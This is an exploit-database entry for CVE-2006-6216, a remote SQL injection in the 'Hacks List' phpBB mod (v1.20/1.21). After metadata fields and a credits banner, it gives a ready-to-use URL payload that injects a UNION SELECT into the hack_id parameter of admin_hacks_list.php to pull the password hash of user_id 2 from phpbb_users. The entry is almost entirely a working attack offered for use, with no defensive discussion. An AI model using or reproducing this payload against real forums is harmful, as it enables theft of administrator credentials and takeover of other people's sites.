Hacks List phpBB Mod 1.21 - SQL Injection
Author: the master
type: webapps
platform: php
port:
date_added: 2006-11-25
date_updated:
verified: 1
codes: OSVDB-35833;CVE-2006-6216
tags:
aliases:
screenshot_url:
application_url:
########################################################################
# Admin Hacks List v1.20 Remote SQL Injection Vulnerability
#
# Download: http://www.nivisec.com
#
# Found By: the master
#
########################################################################
# exploit:
#
# http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash
#
# Greetz: str0ke , Dr Max Virus
########################################################################
# milw0rm.com [2006-11-26]